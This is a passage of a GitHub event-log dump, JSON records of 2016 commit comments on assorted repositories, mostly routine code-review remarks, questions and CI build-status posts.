Flexbox, there are both rows and *true* columns,\n> and the children of a row or column are called \"items\".\n> http://www.sketchingwithcss.com/samplechapter/cheatsheet.html#column\n>\n> Do you think that this terminology should be reflected in our grid system?\n> The argument I can see for doing this would be if we wanted to ever use\n> flex columns. If we don't, then it might not be necessary.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/SCPR/scpr-style-guide/commit/3fa66614b14976d91ac18dbd83096047e2c9cb04#commitcomment-19102826>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAbAc6ZYReVfGOrSVWLOKkt0QQ01-Mdlks5qsDf5gaJpZM4KB9FW>\n> .\n>\n"}},"created_at":"2016-09-20T19:53:31Z"}
{"id":"4592071950","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19102936,"position":11,"line":22,"path":"src/test/java/xigua/battle/of/elements/model/IntWithMaxTest.java","commit_id":"b73ddd838883b86ca471051182b84c09ef479f7c","created_at":"2016-09-20T19:53:50Z","updated_at":"2016-09-20T19:53:50Z","body":"两种情况的话是不是分开来写好一些呢？"}},"created_at":"2016-09-20T19:53:50Z"}
{"id":"4592074943","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19102944,"position":null,"line":null,"path":null,"commit_id":"f5e0dc9bae1507a8e74bc8e4543bc239d87ebb31","created_at":"2016-09-20T19:54:22Z","updated_at":"2016-09-20T19:54:22Z","body":"This is so much cleaner, anyway. Thank you."}},"created_at":"2016-09-20T19:54:22Z"}
{"id":"4592075941","type":"CommitCommentEvent","actor":{"login":"olegrjumin"},"repo":{"name":"olegrjumin/Health-App-Calendar-UI"},"payload":{"comment":{"id":19102945,"position":7,"line":7,"path":".gitignore","commit_id":"194b3a921aa75d2577a98c6418b62e06452a6e92","created_at":"2016-09-20T19:54:34Z","updated_at":"2016-09-20T19:54:34Z","body":"Here is my comment #1 "}},"created_at":"2016-09-20T19:54:34Z"}
{"id":"4592077124","type":"CommitCommentEvent","actor":{"login":"olegrjumin"},"repo":{"name":"olegrjumin/Health-App-Calendar-UI"},"payload":{"comment":{"id":19102950,"position":7,"line":7,"path":"bundle.js","commit_id":"194b3a921aa75d2577a98c6418b62e06452a6e92","created_at":"2016-09-20T19:54:46Z","updated_at":"2016-09-20T19:54:46Z","body":"Here is my another comment #1 "}},"created_at":"2016-09-20T19:54:46Z"}
{"id":"4592080516","type":"CommitCommentEvent","actor":{"login":"olegrjumin"},"repo":{"name":"olegrjumin/Health-App-Calendar-UI"},"payload":{"comment":{"id":19102958,"position":8,"line":39,"path":"js/main.js","commit_id":"ab0b0dbdf2bcaefdb61d75be2001a5d6433c179f","created_at":"2016-09-20T19:55:24Z","updated_at":"2016-09-20T19:55:24Z","body":"Another comment #1 "}},"created_at":"2016-09-20T19:55:24Z"}
{"id":"4592081316","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19102961,"position":18,"line":18,"path":"src/test/java/xigua/battle/of/elements/model/battle/EnvironmentTest.java","commit_id":"f0781a04b10e34069b224f81fed0413c87bc7693","created_at":"2016-09-20T19:55:33Z","updated_at":"2016-09-20T19:55:33Z","body":"测试`List`的话应该使用`containsExactly`这个方法 =)"}},"created_at":"2016-09-20T19:55:33Z"}
{"id":"4592082788","type":"CommitCommentEvent","actor":{"login":"Sergey778"},"repo":{"name":"loebrud/LIS3MDL-JAVA-ME-EMBED-DRIVER"},"payload":{"comment":{"id":19102964,"position":103,"line":103,"path":"SensorLIS3MDL.java","commit_id":"a446e7c5d7efc1765696fe25516fb793a24eaffb","created_at":"2016-09-20T19:55:48Z","updated_at":"2016-09-20T19:55:48Z","body":"Here's also bitwise or operator instead of logical or"}},"created_at":"2016-09-20T19:55:48Z"}
{"id":"4592088639","type":"CommitCommentEvent","actor":{"login":"eugeneia"},"repo":{"name":"snabbco/snabb"},"payload":{"comment":{"id":19102982,"position":28,"line":56,"path":"src/apps/ipsec/esp.lua","commit_id":"fa01474c430dbf938feda5d5df7775b377b14fe2","created_at":"2016-09-20T19:56:47Z","updated_at":"2016-09-20T19:56:47Z","body":"I thought so too at first, but if we reset `decap_fail` here we give an attacker the ability to prevent resync indefinitely (DoS). Plain resource DoS is of course amplified this way, but authenticated packets will reset `decap_fail` and thus cancel out the resync overhead, when it would actually hurt. Does that make sense?"}},"created_at":"2016-09-20T19:56:47Z"}
{"id":"4592095179","type":"CommitCommentEvent","actor":{"login":"Ravenstine"},"repo":{"name":"SCPR/scpr-style-guide"},"payload":{"comment":{"id":19102990,"position":null,"line":null,"path":null,"commit_id":"3fa66614b14976d91ac18dbd83096047e2c9cb04","created_at":"2016-09-20T19:57:56Z","updated_at":"2016-09-20T19:57:56Z","body":"Yeah, for me it's kinda six or one for half a dozen or another, since we can already create \"columns\" when we need to with the way it currently works.  So I think we should keep the existing convention."}},"created_at":"2016-09-20T19:57:56Z"}
{"id":"4592103096","type":"CommitCommentEvent","actor":{"login":"garbear"},"repo":{"name":"kodi-game/game.libretro.gambatte"},"payload":{"comment":{"id":19103000,"position":null,"line":null,"path":null,"commit_id":"d67447cf3a63c9074b2dec5e7679fd7a5485e0b8","created_at":"2016-09-20T19:59:19Z","updated_at":"2016-09-20T19:59:19Z","body":"@lrusak Gambatte probably needs to be updated in LE"}},"created_at":"2016-09-20T19:59:19Z"}
{"id":"4592104050","type":"CommitCommentEvent","actor":{"login":"iluwatar"},"repo":{"name":"iluwatar/java-design-patterns"},"payload":{"comment":{"id":19103001,"position":1,"line":3,"path":"abstract-document/etc/abstract-document.urm.puml","commit_id":"6026eedd51b9753250051b620312bbedd2ccd6ef","created_at":"2016-09-20T19:59:26Z","updated_at":"2016-09-20T19:59:26Z","body":"@markusmo3 the beef is the `pom.xml` change. It suppresses the Eclipse complaint I post you picture about. The other changes are just regenerated .pumls."}},"created_at":"2016-09-20T19:59:26Z"}
{"id":"4592106985","type":"CommitCommentEvent","actor":{"login":"lizschwab"},"repo":{"name":"angular-ui/ui-grid"},"payload":{"comment":{"id":19103006,"position":null,"line":null,"path":null,"commit_id":"0c044cafa449d0ff21105e0dc142c66aaffcbcbe","created_at":"2016-09-20T19:59:53Z","updated_at":"2016-09-20T19:59:53Z","body":"Found a thread that has a good fix for this:\r\nhttps://github.com/angular-ui/ui-grid/issues/2245"}},"created_at":"2016-09-20T19:59:53Z"}
{"id":"4587031660","type":"CommitCommentEvent","actor":{"login":"devrandom"},"repo":{"name":"DaC00P/tablegetter"},"payload":{"comment":{"id":19089121,"position":44,"line":79,"path":"frontend/component/restaurant_map.jsx","commit_id":"7978aa8b65171edc5026008506ebf766790a7a53","created_at":"2016-09-20T02:00:00Z","updated_at":"2016-09-20T02:00:00Z","body":"The function name `getMapBounds` starts with the word \"get\", which hints that the function is read-only.  In that case, it shouldn't mutate state, like it does on this line."}},"created_at":"2016-09-20T02:00:00Z"}
{"id":"4587033167","type":"CommitCommentEvent","actor":{"login":"devrandom"},"repo":{"name":"DaC00P/tablegetter"},"payload":{"comment":{"id":19089126,"position":47,"line":82,"path":"frontend/component/restaurant_map.jsx","commit_id":"7978aa8b65171edc5026008506ebf766790a7a53","created_at":"2016-09-20T02:00:24Z","updated_at":"2016-09-20T02:00:24Z","body":"Why not just -180?"}},"created_at":"2016-09-20T02:00:24Z"}
{"id":"4587035117","type":"CommitCommentEvent","actor":{"login":"badone"},"repo":{"name":"cbodley/ceph"},"payload":{"comment":{"id":19089146,"position":null,"line":null,"path":null,"commit_id":"381605e34a44edb9acfcfb5a56bd598b020e022f","created_at":"2016-09-20T02:01:04Z","updated_at":"2016-09-20T02:01:04Z","body":"Need to make the \"Fixes:\" line a url to the tracker since a raw #11135 refers to PR 11135 and shows up there. See https://github.com/ceph/ceph/pull/11135"}},"created_at":"2016-09-20T02:01:04Z"}
{"id":"4587042544","type":"CommitCommentEvent","actor":{"login":"devrandom"},"repo":{"name":"DaC00P/tablegetter"},"payload":{"comment":{"id":19089170,"position":54,"line":89,"path":"frontend/component/restaurant_map.jsx","commit_id":"7978aa8b65171edc5026008506ebf766790a7a53","created_at":"2016-09-20T02:03:48Z","updated_at":"2016-09-20T02:03:48Z","body":"Why change `lngsw` here, instead of either:\r\n\r\n- create a new variable, or\r\n- just plug in the desired value in the statement that sets `mapBoundsTwo`\r\n\r\nIt's normally best not to change variable values (const is a good thing), unless it's in an obvious way and easy to read (e.g. a loop variable).\r\n"}},"created_at":"2016-09-20T02:03:48Z"}
{"id":"4587046019","type":"CommitCommentEvent","actor":{"login":"devrandom"},"repo":{"name":"DaC00P/tablegetter"},"payload":{"comment":{"id":19089175,"position":17,"line":52,"path":"frontend/component/restaurant_map.jsx","commit_id":"7978aa8b65171edc5026008506ebf766790a7a53","created_at":"2016-09-20T02:04:39Z","updated_at":"2016-09-20T02:04:39Z","body":"I would rewrite this function to be easier to read.  See other comments."}},"created_at":"2016-09-20T02:04:39Z"}
{"id":"4587046646","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19089176,"position":null,"line":null,"path":null,"commit_id":"22c4a04f5e4e54d66cb51f00a286a6f412468fd0","created_at":"2016-09-20T02:04:52Z","updated_at":"2016-09-20T02:04:52Z","body":"ASIHPValidation (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1766 of 1766 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.13%25-green.svg)</a>\n"}},"created_at":"2016-09-20T02:04:52Z"}
{"id":"4587046883","type":"CommitCommentEvent","actor":{"login":"xuguangxin"},"repo":{"name":"lizhong1008/libyami-utils"},"payload":{"comment":{"id":19089177,"position":21,"line":125,"path":"tests/yamitranscode.cpp","commit_id":"43a09803ae976e3d1815a4867fc37e5f0804dce3","created_at":"2016-09-20T02:04:57Z","updated_at":"2016-09-20T02:04:57Z","body":"Could we change print_help too?"}},"created_at":"2016-09-20T02:04:57Z"}
{"id":"4587048601","type":"CommitCommentEvent","actor":{"login":"wrongu"},"repo":{"name":"thouis/AlphaGo"},"payload":{"comment":{"id":19089181,"position":750,"line":333,"path":"AlphaGo/go.py","commit_id":"243dd77a6edbf369eb398b29bfc1a724950c5b2f","created_at":"2016-09-20T02:05:33Z","updated_at":"2016-09-20T02:05:33Z","body":"do you need every stone in every group, or just one with `next(g) for g in self.get_groups_around(action)`? (all stones in a group share a reference to the same `liberty_set`)"}},"created_at":"2016-09-20T02:05:33Z"}
{"id":"4587050509","type":"CommitCommentEvent","actor":{"login":"SubDragonzj"},"repo":{"name":"CyanogenMod/android_device_motorola_msm8226-common"},"payload":{"comment":{"id":19089187,"position":null,"line":null,"path":null,"commit_id":"9886760007f5fd9a67916a115833b6f4b60068c1","created_at":"2016-09-20T02:06:16Z","updated_at":"2016-09-20T02:06:16Z","body":"Excuse me. The Moto msm8226 cm14, camera working?"}},"created_at":"2016-09-20T02:06:16Z"}
{"id":"4587050643","type":"CommitCommentEvent","actor":{"login":"SkyrisBactera"},"repo":{"name":"Execodeable/Execodeable.github.io"},"payload":{"comment":{"id":19089189,"position":null,"line":null,"path":null,"commit_id":"b8ab2fc4431dea1e7089f54a9f9be6e642e53866","created_at":"2016-09-20T02:06:18Z","updated_at":"2016-09-20T02:06:18Z","body":"NO! This is shit!"}},"created_at":"2016-09-20T02:06:18Z"}
{"id":"4587051762","type":"CommitCommentEvent","actor":{"login":"wrongu"},"repo":{"name":"thouis/AlphaGo"},"payload":{"comment":{"id":19089193,"position":758,"line":341,"path":"AlphaGo/go.py","commit_id":"243dd77a6edbf369eb398b29bfc1a724950c5b2f","created_at":"2016-09-20T02:06:43Z","updated_at":"2016-09-20T02:06:43Z","body":"return False rather than assert?"}},"created_at":"2016-09-20T02:06:43Z"}
{"id":"4587052035","type":"CommitCommentEvent","actor":{"login":"johnfn"},"repo":{"name":"VSCodeVim/Vim"},"payload":{"comment":{"id":19089195,"position":null,"line":null,"path":null,"commit_id":"99a7c434246047ac7f91aabe99804925b7af5a3c","created_at":"2016-09-20T02:06:48Z","updated_at":"2016-09-20T02:06:48Z","body":"We should not have duplicated put and putByKey here, since they have essentially the same body."}},"created_at":"2016-09-20T02:06:48Z"}
{"id":"4587056173","type":"CommitCommentEvent","actor":{"login":"jtarchie"},"repo":{"name":"jmcarp/pullrequest-resource"},"payload":{"comment":{"id":19089204,"position":null,"line":null,"path":null,"commit_id":"1f7b2009d7b8de48ece838e05896bac9b14a7b62","created_at":"2016-09-20T02:08:21Z","updated_at":"2016-09-20T02:08:21Z","body":"This won't work, as the `version` is not `params` it is an attribute on the `get`."}},"created_at":"2016-09-20T02:08:21Z"}
{"id":"4587059726","type":"CommitCommentEvent","actor":{"login":"Cretezy"},"repo":{"name":"davidchua/pymessenger"},"payload":{"comment":{"id":19089211,"position":null,"line":null,"path":null,"commit_id":"b5715d6b92695d61bf0bd9f8b1eab14f2f0ca06e","created_at":"2016-09-20T02:09:40Z","updated_at":"2016-09-20T02:09:40Z","body":"👍 "}},"created_at":"2016-09-20T02:09:40Z"}
{"id":"4587061705","type":"CommitCommentEvent","actor":{"login":"Cretezy"},"repo":{"name":"davidchua/pymessenger"},"payload":{"comment":{"id":19089216,"position":null,"line":null,"path":null,"commit_id":"b5715d6b92695d61bf0bd9f8b1eab14f2f0ca06e","created_at":"2016-09-20T02:10:23Z","updated_at":"2016-09-20T02:10:23Z","body":"Fixes the tests! Nice, sorry for forgetting about this"}},"created_at":"2016-09-20T02:10:23Z"}
{"id":"4587066655","type":"CommitCommentEvent","actor":{"login":"mdo"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":19089225,"position":null,"line":null,"path":null,"commit_id":"63129112bbea91f7cd62014f162f857f50084656","created_at":"2016-09-20T02:12:06Z","updated_at":"2016-09-20T02:12:06Z","body":"Some folks don't like to see profanities in our source code. I don't have a problem with it either way, but if someone goes through the trouble of creating a PR for it, I'm usually down to incorporate the change. If you're salty about this, please take the complaints elsewhere—it's really not a big deal to me :)."}},"created_at":"2016-09-20T02:12:06Z"}
{"id":"4587067746","type":"CommitCommentEvent","actor":{"login":"CNevd"},"repo":{"name":"CNevd/Difacto_DMLC"},"payload":{"comment":{"id":19089231,"position":null,"line":null,"path":null,"commit_id":"e2db5ee990f39ded179d5267d9854a239a34f519","created_at":"2016-09-20T02:12:36Z","updated_at":"2016-09-20T02:12:36Z","body":"now multipath is supported;\r\neg:\r\n``` train_data=\"hdfs://file1;hdfs://file2;hdfs://file3\"```\r\nthe delim among different files only support ```;```"}},"created_at":"2016-09-20T02:12:36Z"}
{"id":"4587068431","type":"CommitCommentEvent","actor":{"login":"LuPan2015"},"repo":{"name":"baifendian/Sirius"},"payload":{"comment":{"id":19089235,"position":null,"line":null,"path":null,"commit_id":"3429925f3dfc55b30ce6167699f231620662bb23","created_at":"2016-09-20T02:12:51Z","updated_at":"2016-09-20T02:12:51Z","body":"描述有点问题。是登录也样式紧急修复。不是首页。"}},"created_at":"2016-09-20T02:12:51Z"}
{"id":"4587069735","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"z956/phonebook"},"payload":{"comment":{"id":19089238,"position":null,"line":null,"path":null,"commit_id":"d4141ad07e0dacab219e7171bd4a439d5be3e4aa","created_at":"2016-09-20T02:13:21Z","updated_at":"2016-09-20T02:13:21Z","body":"It is not a valid link pointing to informative resources."}},"created_at":"2016-09-20T02:13:21Z"}
{"id":"4587072395","type":"CommitCommentEvent","actor":{"login":"wrongu"},"repo":{"name":"thouis/AlphaGo"},"payload":{"comment":{"id":19089241,"position":768,"line":351,"path":"AlphaGo/go.py","commit_id":"243dd77a6edbf369eb398b29bfc1a724950c5b2f","created_at":"2016-09-20T02:14:21Z","updated_at":"2016-09-20T02:14:21Z","body":"My understanding of this assertion is that it makes sure that `action` was actually played on one of the two liberties of the prey group. Checking that would be quicker, maybe, and could happen before the `copy`? Or is there something that could happen with captures, opening up other liberties?"}},"created_at":"2016-09-20T02:14:21Z"}
{"id":"4587076389","type":"CommitCommentEvent","actor":{"login":"sosocom"},"repo":{"name":"sosocom/Hello"},"payload":{"comment":{"id":19089253,"position":null,"line":null,"path":null,"commit_id":"f7c9bf7042ea92b5aec9d2cab88076db71768f00","created_at":"2016-09-20T02:15:52Z","updated_at":"2016-09-20T02:15:52Z","body":"I don't understand how to push by git command in OX"}},"created_at":"2016-09-20T02:15:52Z"}
{"id":"4587076566","type":"CommitCommentEvent","actor":{"login":"serefser"},"repo":{"name":"serefser/billing"},"payload":{"comment":{"id":19089255,"position":null,"line":null,"path":null,"commit_id":"8cecfd44277127d99cca24172d70a9449327c270","created_at":"2016-09-20T02:15:56Z","updated_at":"2016-09-20T02:15:56Z","body":"comment is important to understand why this change was done"}},"created_at":"2016-09-20T02:15:56Z"}
{"id":"4587077825","type":"CommitCommentEvent","actor":{"login":"serefser"},"repo":{"name":"serefser/billing"},"payload":{"comment":{"id":19089260,"position":null,"line":null,"path":null,"commit_id":"8cecfd44277127d99cca24172d70a9449327c270","created_at":"2016-09-20T02:16:22Z","updated_at":"2016-09-20T02:16:22Z","body":"dd-mm-yyyy"}},"created_at":"2016-09-20T02:16:22Z"}
{"id":"4587077928","type":"CommitCommentEvent","actor":{"login":"Webapp1"},"repo":{"name":"Webapp1/swift-HelloToTheUniverse-lab-swift-intro-000"},"payload":{"comment":{"id":19089262,"position":null,"line":null,"path":null,"commit_id":"0042d2117c77185c0443d57b6ec05a75495cbc7b","created_at":"2016-09-20T02:16:25Z","updated_at":"2016-09-20T02:16:25Z","body":"Hello"}},"created_at":"2016-09-20T02:16:25Z"}
{"id":"4587078857","type":"CommitCommentEvent","actor":{"login":"wrongu"},"repo":{"name":"thouis/AlphaGo"},"payload":{"comment":{"id":19089265,"position":776,"line":359,"path":"AlphaGo/go.py","commit_id":"243dd77a6edbf369eb398b29bfc1a724950c5b2f","created_at":"2016-09-20T02:16:47Z","updated_at":"2016-09-20T02:16:47Z","body":"`get_groups_around` returns a list of sets."}},"created_at":"2016-09-20T02:16:47Z"}
{"id":"4587079733","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19089269,"position":null,"line":null,"path":null,"commit_id":"856fb6cd8274baf4434fe93cde93fcf42b5e871b","created_at":"2016-09-20T02:17:07Z","updated_at":"2016-09-20T02:17:07Z","body":"Lol wut"}},"created_at":"2016-09-20T02:17:07Z"}
{"id":"4587080459","type":"CommitCommentEvent","actor":{"login":"wrongu"},"repo":{"name":"thouis/AlphaGo"},"payload":{"comment":{"id":19089273,"position":750,"line":333,"path":"AlphaGo/go.py","commit_id":"243dd77a6edbf369eb398b29bfc1a724950c5b2f","created_at":"2016-09-20T02:17:24Z","updated_at":"2016-09-20T02:17:24Z","body":"(Also, as mentioned below, `get_groups_around` returns a list of sets of stones)"}},"created_at":"2016-09-20T02:17:24Z"}
{"id":"4587082257","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19089279,"position":null,"line":null,"path":null,"commit_id":"856fb6cd8274baf4434fe93cde93fcf42b5e871b","created_at":"2016-09-20T02:18:06Z","updated_at":"2016-09-20T02:18:06Z","body":"i was making a C++ class instead of wrapping, lulz."}},"created_at":"2016-09-20T02:18:06Z"}
{"id":"4587082272","type":"CommitCommentEvent","actor":{"login":"jhjin"},"repo":{"name":"jhjin/triplet-criterion"},"payload":{"comment":{"id":19089280,"position":3,"line":3,"path":"TripletCriterion.cu","commit_id":"5323f705ada9265e709ca68d2caedba7cd398282","created_at":"2016-09-20T02:18:06Z","updated_at":"2016-09-20T02:18:06Z","body":"Because no API from THCUNN.h was used"}},"created_at":"2016-09-20T02:18:06Z"}
{"id":"4587083311","type":"CommitCommentEvent","actor":{"login":"thouis"},"repo":{"name":"thouis/AlphaGo"},"payload":{"comment":{"id":19089285,"position":750,"line":333,"path":"AlphaGo/go.py","commit_id":"243dd77a6edbf369eb398b29bfc1a724950c5b2f","created_at":"2016-09-20T02:18:33Z","updated_at":"2016-09-20T02:18:33Z","body":"Just one stone per group.   I was trying to write \"all groups of the other player adjacent to `action` with two liberties\".  I may have translated that incorrectly into code."}},"created_at":"2016-09-20T02:18:33Z"}
{"id":"4587084737","type":"CommitCommentEvent","actor":{"login":"gg-soeda"},"repo":{"name":"kikimetal/camp-challenge"},"payload":{"comment":{"id":19089296,"position":43,"line":43,"path":"CampChallenge_PHP/007.PHPからのDB操作/09.php","commit_id":"d0906f5a8dea8309d906f1e17470b5ae1a8911c8","created_at":"2016-09-20T02:19:05Z","updated_at":"2016-09-20T02:19:05Z","body":"添田です。\r\nactionを省略しているのは、データの送信先が同じファイルになるのを理解してという事でOKでしょうか。\r\n誤動作を回避するためにも、基本的にはactionは省略しない方が良いですね。"}},"created_at":"2016-09-20T02:19:05Z"}
{"id":"4587085847","type":"CommitCommentEvent","actor":{"login":"thouis"},"repo":{"name":"thouis/AlphaGo"},"payload":{"comment":{"id":19089301,"position":758,"line":341,"path":"AlphaGo/go.py","commit_id":"243dd77a6edbf369eb398b29bfc1a724950c5b2f","created_at":"2016-09-20T02:19:30Z","updated_at":"2016-09-20T02:19:30Z","body":"The intent here was if the `check_groups = [prey_group]` line was executed by a call from `is_ladder_escape` to make sure my logic there was correct."}},"created_at":"2016-09-20T02:19:30Z"}
{"id":"4587086047","type":"CommitCommentEvent","actor":{"login":"hotzhangle"},"repo":{"name":"Valloric/YouCompleteMe"},"payload":{"comment":{"id":19089302,"position":51,"line":690,"path":"python/ycm/youcompleteme.py","commit_id":"30871bcebbd6ae0ca2d4766f9236dda19f40db81","created_at":"2016-09-20T02:19:35Z","updated_at":"2016-09-20T02:19:35Z","body":"when I upgrade the lastest version of ycm, I find use vim open a file,there always report this exception,like \"处理 function youcompleteme#Enable..<SNR>71_OnBufferRead 时发生错误\"  and \"E117: Unknown function: UltiSnips#SnippetsInCurrentScope\" and \"E15: 无效的表达式: UltiSnips#SnippetsInCurrentScope( 1 ),that pullzed me,to avoid this problem,I reset YCM version to commit ID:e8047050cd6209374fbb7cd4259801a25a1ee47e"}},"created_at":"2016-09-20T02:19:35Z"}
{"id":"4587086975","type":"CommitCommentEvent","actor":{"login":"thouis"},"repo":{"name":"thouis/AlphaGo"},"payload":{"comment":{"id":19089306,"position":768,"line":351,"path":"AlphaGo/go.py","commit_id":"243dd77a6edbf369eb398b29bfc1a724950c5b2f","created_at":"2016-09-20T02:19:58Z","updated_at":"2016-09-20T02:19:58Z","body":"This assert is probably unnecessary, given the checks above."}},"created_at":"2016-09-20T02:19:58Z"}
{"id":"4587090208","type":"CommitCommentEvent","actor":{"login":"thouis"},"repo":{"name":"thouis/AlphaGo"},"payload":{"comment":{"id":19089317,"position":776,"line":359,"path":"AlphaGo/go.py","commit_id":"243dd77a6edbf369eb398b29bfc1a724950c5b2f","created_at":"2016-09-20T02:21:10Z","updated_at":"2016-09-20T02:21:10Z","body":"Would the right thing to be to take just one element from each set, then? "}},"created_at":"2016-09-20T02:21:10Z"}
{"id":"4587090349","type":"CommitCommentEvent","actor":{"login":"wrongu"},"repo":{"name":"thouis/AlphaGo"},"payload":{"comment":{"id":19089319,"position":776,"line":359,"path":"AlphaGo/go.py","commit_id":"243dd77a6edbf369eb398b29bfc1a724950c5b2f","created_at":"2016-09-20T02:21:13Z","updated_at":"2016-09-20T02:21:13Z","body":"Also, I think every other use of `get_groups_around(a)` has been used when `board[a]` is empty. If `p` is part of a group, its own group will be returned here as well. So either `get_groups_around` should exclude `p`'s group, or you should add a check that `(gx,gy)` are the hunter in the next line"}},"created_at":"2016-09-20T02:21:13Z"}
{"id":"4587091653","type":"CommitCommentEvent","actor":{"login":"thanglenguyen"},"repo":{"name":"thanglenguyen/esp8266_thingspeak_homeautomation"},"payload":{"comment":{"id":19089321,"position":null,"line":null,"path":null,"commit_id":"6eb57781699d8515611084e3bc7b59d0e126d9fa","created_at":"2016-09-20T02:21:45Z","updated_at":"2016-09-20T02:21:45Z","body":"This project has been done for long time ago just for demo. I am sorry that I don't have any video or descriptive for it.\r\n\r\nHowever, what is your problem right now?\r\nCan your ESP8266 connect to internet yet?\r\nIf it is, so everything is very straightforward. Thingspeak is just application on top of your internet-base device. You can even easily try Thingspeak demo on your own computer by following their instruction on the website. It is pretty easy and descriptive."}},"created_at":"2016-09-20T02:21:45Z"}
{"id":"4587091793","type":"CommitCommentEvent","actor":{"login":"gg-soeda"},"repo":{"name":"kikimetal/camp-challenge"},"payload":{"comment":{"id":19089322,"position":151,"line":151,"path":"CampChallenge_PHP/007.PHPからのDB操作/09.php","commit_id":"d0906f5a8dea8309d906f1e17470b5ae1a8911c8","created_at":"2016-09-20T02:21:48Z","updated_at":"2016-09-20T02:21:48Z","body":"添田です。\r\n自分でテストとしてやる分には、良いですね。ちゃんと何が重複したか確認できるので。\r\nただし、実際のシステムでやると危険なので、基本的には重複してますよという文章のみにするようにしてください。"}},"created_at":"2016-09-20T02:21:48Z"}
{"id":"4587094728","type":"CommitCommentEvent","actor":{"login":"sghinton"},"repo":{"name":"sghinton/python-class"},"payload":{"comment":{"id":19089333,"position":25,"line":25,"path":"bounce/bounce.py","commit_id":"fbc820f8ca6324fbc4ded65bfe75f9b4f589c38f","created_at":"2016-09-20T02:23:00Z","updated_at":"2016-09-20T02:23:00Z","body":"> Can you find a way to make this code easier to understand?  What is\n> `pos[0]` or `pos[1]`?  What do they mean?\n>\n> --\n> You are receiving this because you authored the thread.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/sghinton/python-class/commit/fbc820f8ca6324fbc4ded65bfe75f9b4f589c38f#commitcomment-19066382\n`pos[0]` is meaning to say position 0, and the same with `pos[1]`.\n You are receiving this because I am nice and answer your emails.\n\n\n"}},"created_at":"2016-09-20T02:23:00Z"}
{"id":"4587099226","type":"CommitCommentEvent","actor":{"login":"sghinton"},"repo":{"name":"sghinton/python-class"},"payload":{"comment":{"id":19089347,"position":null,"line":null,"path":null,"commit_id":"fbc820f8ca6324fbc4ded65bfe75f9b4f589c38f","created_at":"2016-09-20T02:24:46Z","updated_at":"2016-09-20T02:24:46Z","body":"> This looks pretty good -- and it plays pretty well.  It's hard!\n>\n> I look forward to getting your solutions for the programming puzzles!\n>\n> --\n> You are receiving this because you authored the thread.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/sghinton/python-class/commit/fbc820f8ca6324fbc4ded65bfe75f9b4f589c38f#commitcomment-19066389\nI am working on the programming puzzles, so keep your shirt on!\n\n"}},"created_at":"2016-09-20T02:24:46Z"}
{"id":"4587100939","type":"CommitCommentEvent","actor":{"login":"gg-soeda"},"repo":{"name":"kikimetal/camp-challenge"},"payload":{"comment":{"id":19089353,"position":207,"line":207,"path":"CampChallenge_PHP/007.PHPからのDB操作/09.php","commit_id":"d0906f5a8dea8309d906f1e17470b5ae1a8911c8","created_at":"2016-09-20T02:25:20Z","updated_at":"2016-09-20T02:25:20Z","body":"添田です。\r\n$eをせっかく取ってるので、使いましょう。問題が発生した時のヒントを得られます。"}},"created_at":"2016-09-20T02:25:20Z"}
{"id":"4587101279","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19089356,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-20T02:25:27Z","updated_at":"2016-09-20T02:25:27Z","body":"Sizing-Simple-Chilled-Ceiling (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1192 of 1192 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-20T02:25:27Z"}
